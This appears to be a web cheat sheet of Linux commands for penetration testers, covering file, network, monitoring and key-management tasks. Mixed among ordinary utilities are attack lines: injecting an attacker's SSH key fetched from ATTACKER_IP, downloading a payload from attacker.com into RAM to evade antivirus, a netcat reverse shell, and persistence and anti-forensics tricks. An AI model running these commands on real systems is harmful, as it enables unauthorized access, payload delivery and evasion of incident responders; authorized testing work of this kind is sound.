Practical Linux Commands

In penetration testing, Linux commands can be incredibly powerful when used efficiently. The following guide provides practical Linux commands for pentesters, explaining what each command does and how it can help during an engagement. These commands cover file manipulation, networking, process monitoring, and more.

File Manipulation Commands

1. Base64 Encoding for Exfiltration

   Copy

   base64 -w 0 file

   Encodes a file to Base64 without line breaks. Useful for encoding data in a way that can be sent via HTTP or other text-based protocols.

2. Hex Dump Without New Lines

   Copy

   xxd -p boot12.bin | tr -d '\n'

   Converts a binary file into a plain hex format. Removing new lines makes the output easier to manipulate, which is helpful for crafting payloads.

3. Public Key Injection

   Copy

   curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

   Adds an attacker's public key to the target machine’s authorized SSH keys. This gives the attacker remote access via SSH.

4. Count Lines in a File

   Copy

   wc -l <file>

   Counts the number of lines in a file, useful for verifying the amount of output or checking logs.

5. Sort and Remove Duplicates

   Copy

   sort file | uniq

   Sorts a file and removes duplicate lines. This is helpful when processing log files and identifying unique entries.

6. Find Files Modified Within a Date Range

   Copy

   find / -newermt 2023-08-01 ! -newermt 2023-08-05 -type f

   Finds files modified between specific dates, aiding in identifying files that may have been tampered with during an attack.

Networking and Communication Commands

1. Set Up an HTTP Server (Quick File Serving)

   Copy

   python3 -m http.server 80

   Creates an HTTP server to share files with the target machine. This is useful for serving payloads or retrieving data.

2. Curl for Sending JSON Data

   Copy

   curl --header "Content-Type: application/json" --request POST --data '{"username":"admin","password":"password"}' http://target/endpoint

   Sends JSON data to a web application, ideal for testing API endpoints or mimicking application behavior.

3. SSH Key Scanning

   Copy

   ssh-keyscan 10.10.10.101

   Retrieves the SSH key fingerprint from a remote machine. It helps in identifying duplicate SSH hosts, reducing security blind spots.

System Monitoring & Process Management

1. List Open Files of Network Processes

   Copy

   lsof -i

   Lists open files related to network processes. This is particularly useful to identify suspicious connections or find the process behind an open port.

2. Process Monitoring with ps

   Copy

   ps aux | grep apache

   Shows all processes and filters them by name (in this case, apache). This command helps you discover running services on the system.

3. Finding Network Connections

   Copy

   netstat -an | grep ESTABLISHED

   Displays established network connections. Essential for spotting backdoors or open connections to attacker-controlled servers.

Encryption and Key Management

1. Generate RSA Key

   Copy

   openssl genrsa -out attacker.key 2048

   Creates an RSA key, which can be used for encrypted communication, establishing secure connections, or signing data.

2. Decrypt SSH Key

   Copy

   openssl rsa -in key.ssh.enc -out key.ssh

   Decrypts an encrypted SSH private key. Useful when handling compromised SSH keys that are password protected.

3. Create a Signed Certificate

   Copy

   openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

   Creates a self-signed certificate, which can be used to mimic HTTPS servers for man-in-the-middle (MITM) attacks or phishing.

Privilege Escalation Tools

1. Set Immutable Bit on a File

   Copy

   sudo chattr +i /path/to/file

   Prevents modification or deletion of a file. Setting this flag can be a persistence technique to maintain unauthorized changes.

2. Find SUID Binaries

   Copy

   find / -perm -4000 2>/dev/null

   Finds all files with the SUID bit set. SUID binaries are a common target for privilege escalation attacks, making this a valuable command during enumeration.

Exploitation Utilities

1. Download to RAM to Evade Detection

   Copy

   wget http://attacker.com/payload.py -O /dev/shm/payload.py

   Downloads a file directly into the system’s RAM, making it less detectable by antivirus and other security software.

2. Running a Reverse Shell with Netcat

   Copy

   nc -e /bin/bash 10.10.10.10 4444

   Establishes a reverse shell from the target to the attacker's machine. This command is a cornerstone for remote code execution exploits.

Advanced Grep for Data Extraction

1. Extract Emails

   Copy

   grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt

   Extracts email addresses from files. Useful when searching for credentials or contacts during an attack.

2. Extract Passwords

   Copy

   grep -i "pwd\|pass\|password" file.txt

   Looks for potential password patterns in a file, an essential command for data discovery during internal network penetration tests.

3. Extract IP Addresses

   Copy

   grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" file.txt

   Finds all IP addresses inside a file, helpful for network mapping and identifying potential targets.

Miscellaneous Commands

1. Change Timezone

   Copy

   sudo dpkg-reconfigure tzdata

   Allows the attacker to change the system’s timezone. Useful for modifying timestamps during an attack to mislead incident responders.

2. Mount Virtual Hard Drives

   Copy

   guestmount --add NAME.vhd --inspector --ro /mnt/vhd

   Mounts a VHD file for investigation or exploitation. This can help access virtual machines' data without fully booting them.